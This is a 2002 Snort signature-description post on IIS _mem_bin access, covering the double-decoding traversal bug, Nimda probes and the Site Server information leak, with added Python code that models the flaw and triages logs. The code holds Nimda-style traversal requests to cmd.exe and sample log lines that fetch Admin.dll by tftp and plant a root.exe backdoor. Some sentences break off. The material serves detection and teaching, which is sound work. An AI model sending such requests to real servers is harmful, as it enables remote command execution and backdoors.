[Snort-sigs] WEB-IIS _mem_bin access SID 1286
justanlee at ...12...
Tue May 7 08:48:07 EDT 2002
# This is a template for submitting snort signature descriptions to
# the snort.org website
# Ensure that your descriptions are your own
# and not the work of others. References in the rules themselves
# should be used for linking to other's work.
# If you are unsure of some part of a rule, use that as a commentary
# and someone else perhaps will be able to fix it.
WEB-IIS _mem_bin access
This can be an attempt to gain local user privileges on a webserver, or an
attempt to retrieve information not normally available for public access,
such as the default AUO (LDAP) schema and LDAP user password reminders.
Two areas of impact:
(comment: part 1 is probably covered under other signatures, but since it is
the most common use of _mem_bin attacks, I have included it. Really, you
never see an attack mentioned in part 2 - but it's not impossible ;)
1. Intruders can execute commands remotely on the webserver
2. Intruders can leak information via pages installed in \wwwroot\_mem_bin
by MS Site Server 3.0
(comment: This info probably will be covered in other signatures (such as
cmd.exe or root.exe access))
1. Commands can be executed remotely on the webserver
IIS had two major bugs that allowed commands to be executed remotely on the
webserver: the earlier "Unicode" directory traversal bug and the superfluous
decoding bug (CERT CA-2001-12), in which IIS decodes the requested URL a
second time after its security check has already passed. Intruders could gain
local user permission (the IIS anonymous user account) by using the
superfluous decoding vulnerability to escape the web root. The _mem_bin
directory is chosen for the attack because it is likely to be present
(installed by MS Site Server) and can be used to escape out of \wwwroot\.
More importantly, it may have less strict permissions than standard folders
in \wwwroot\. Other folders that have been used, and which may also have lax
permissions, are /_vti_bin, /scripts and /msadc.
2. Leak information from the webserver
Systems with Site Server version 3.0 with SP3 (and prior) and NT5 SP5 are
Systems with Site Server Commerce Edition are vulnerable
For a description of this type of intrusion see:
Security considerations to keep in mind when using Site Server 3.0
RFP2201: MS Site Server Evilness
1. Execute commands remotely - the command can be anything, but cmd.exe is
commonly requested to test whether a system is vulnerable or already compromised
Will be translated insecurely in unpatched versions of IIS to:
2. Leak Information
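As an added illustration of the translation item 1 above refers to (this is not code from the original submission), the following Python models how an unpatched IIS handles a double-encoded traversal request: it decodes once, checks the result against the web root, then decodes again before opening the file, which is the superfluous decoding flaw of CERT CA-2001-12. The request strings are constructed, modelled on the Nimda probe; the document root C:\Inetpub\wwwroot and the function names are assumptions.

```python
import urllib.parse

# Assumed IIS document root, as a list of path components.
WWWROOT = ["C:", "Inetpub", "wwwroot"]

# Constructed requests, modelled on the Nimda probe (CERT CA-2001-26).
DOUBLE_ENCODED = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir"
SINGLE_ENCODED = "/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir"
BENIGN = "/_mem_bin/remind.asp"


def canonical(url_path, base=WWWROOT):
    """Map a (decoded) URL path onto the filesystem under base, resolving
    '.' and '..' the way Windows does, never climbing above the drive root."""
    parts = list(base)
    for seg in url_path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if len(parts) > 1:          # keep the drive letter
                parts.pop()
            continue
        parts.append(seg)
    return "\\".join(parts)


def inside_wwwroot(fs_path):
    root = "\\".join(WWWROOT)
    return fs_path == root or fs_path.startswith(root + "\\")


def map_request(url, patched):
    """Return (passed_security_check, path_that_would_be_opened).

    Unpatched IIS (CA-2001-12): decode, check, then decode AGAIN and open
    the result, so '%255c' survives the check as the harmless text '%5c'
    and only becomes a real backslash afterwards. Patched IIS opens exactly
    the path it checked.
    """
    stem = url.split("?", 1)[0]
    once = urllib.parse.unquote(stem)       # %255c -> %5c ; %5c -> \
    checked = canonical(once)
    allowed = inside_wwwroot(checked)
    if patched or not allowed:
        return allowed, checked
    twice = urllib.parse.unquote(once)      # the superfluous second pass
    return allowed, canonical(twice)


if __name__ == "__main__":
    for label, url in [("double", DOUBLE_ENCODED), ("single", SINGLE_ENCODED),
                       ("benign", BENIGN)]:
        for patched in (False, True):
            ok, path = map_request(url, patched)
            print(f"{label:6} patched={patched!s:5} "
                  f"check={'pass' if ok else 'FAIL'} opens {path}")
```

The single-encoded form fails the check on both servers, which is why the worm double-encodes the backslash: only the extra decode pass turns a path that looks like an oddly named subdirectory of _mem_bin into C:\winnt\system32\cmd.exe.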
Ease of Attack:
Both types of attack are quite simple.
The attempts to execute commands remotely are typically the Nimda worm
scanning routinely for vulnerable machines (Nimda also probes for the root.exe
backdoor left behind by Code Red II). The attempt to leak information is
slightly more esoteric, and the information gained is probably only useful to
a more advanced intruder.
Both relate to IIS.
For the leak information:
You are using Site Server 3.0 with a service pack later than SP3.
You are not using Site Server 3.0, and do not have the _mem_bin
directory in \wwwroot\ (on any service).
For the attempt to execute a command remotely, the alert is a false positive
(a failed probe) unless the IIS server is unpatched.
If you are using Site Server 3.0, patch with the latest offering from
Microsoft. Remember to re-apply SP6a on NT machines, and the IIS security
roll-up patch. If you do not use /_mem_bin/auoconfig.asp or
/_mem_bin/remind.asp, they can be removed.
If you are not using Site Server 3.0 - remove /_mem_bin from \wwwroot\ if it
Everyone using IIS should ensure they have the latest IIS security roll-up
from Microsoft; it is also a very good idea to run the IIS Lockdown tool
from Microsoft. Check your IIS log files. If they have been tampered with,
or are missing, or you see successful attempts to execute commands remotely,
such as commands to copy files or run tftp, your system has been
compromised. A system wipe followed by a fresh install is the only way to be
certain of removing any backdoors placed by the intruder. This is a very
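The log check described above, as an added example that is not part of the original submission: a small Python triage script over IIS W3C extended log records that classifies requests into /_mem_bin/ as traversal-to-cmd.exe probes, Site Server page fetches, or ordinary access, and flags sources whose copy or tftp command got a 200 back, which is the "already compromised" indicator the text describes. The log excerpt is constructed (modelled on Nimda-style requests), and the field layout, page list and function names are assumptions.

```python
import re
import urllib.parse

# Constructed IIS W3C extended log excerpt (not from any real server). Lines 1-3
# mimic a Nimda-style probe and the follow-on tftp/copy commands the text warns
# about; then a Site Server page fetch, a probe that failed, and ordinary traffic.
SAMPLE_LOG = r"""
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-05-06 23:11:02 10.0.0.5 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 200
2002-05-06 23:11:03 10.0.0.5 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll 200
2002-05-06 23:11:05 10.0.0.5 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\root.exe 200
2002-05-06 23:12:40 192.168.1.9 GET /_mem_bin/auoconfig.asp - 200
2002-05-06 23:13:00 172.16.0.7 GET /_mem_bin/..%255c../winnt/system32/cmd.exe /c+dir 404
2002-05-06 23:14:00 172.16.0.8 GET /_mem_bin/images/logo.gif - 200
"""

# The two Site Server pages the text names as information leaks.
SITE_SERVER_PAGES = {"/_mem_bin/auoconfig.asp", "/_mem_bin/remind.asp"}
# Follow-on commands that indicate a foothold rather than a bare probe.
FOLLOW_ON = re.compile(r"\b(tftp|copy)\b", re.IGNORECASE)


def fully_decode(s):
    """Decode until stable: the effect an unpatched IIS's extra decode pass
    has, so %255c ends up as a real backslash."""
    prev = None
    while prev != s:
        prev, s = s, urllib.parse.unquote(s)
    return s


def escapes_root(stem):
    """True if the fully decoded stem climbs above the web root."""
    depth = 0
    for seg in fully_decode(stem).replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(fields):
    """Classify one parsed record touching /_mem_bin/; None for other URIs."""
    _date, _time, ip, _method, stem, query, status = fields
    low = stem.lower()
    if "/_mem_bin/" not in low:
        return None
    finding = {"ip": ip, "uri": stem, "status": status,
               "succeeded": status == "200", "follow_on": None}
    if escapes_root(stem) and "cmd.exe" in low:
        finding["kind"] = "command execution (traversal to cmd.exe)"
        m = FOLLOW_ON.search(fully_decode(query))
        finding["follow_on"] = m.group(1).lower() if m else None
    elif escapes_root(stem):
        finding["kind"] = "directory traversal"
    elif low in SITE_SERVER_PAGES:
        finding["kind"] = "Site Server information leak"
    else:
        finding["kind"] = "plain _mem_bin access"
    return finding


def triage(log_text):
    """Parse W3C-style lines (comments skipped) and return the findings."""
    findings = []
    for line in log_text.strip().splitlines():
        if line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) != 7:
            continue
        f = classify(fields)
        if f:
            findings.append(f)
    return findings


def confirmed_attack_sources(findings):
    """Sources whose copy/tftp command through cmd.exe returned 200: per the
    text, the server is then compromised, not merely probed."""
    return sorted({f["ip"] for f in findings if f["succeeded"] and f["follow_on"]})


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:12} {f['status']} {f['kind']:42} follow-on={f['follow_on']}")
    print("confirmed attack sources:", confirmed_attack_sources(found))
```

A 200 on a bare cmd.exe?/c+dir is already bad news on an unpatched server, but the copy and tftp follow-ons are the lines that tell you a backdoor (root.exe) or worm payload (Admin.dll) has landed and a rebuild is due; a 404 on the same probe is the noise this signature will generate on a patched host.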
CERT Advisory CA-2001-26 Nimda Worm
CERT Advisory CA-2001-12 Superfluous Decoding Vulnerability in IIS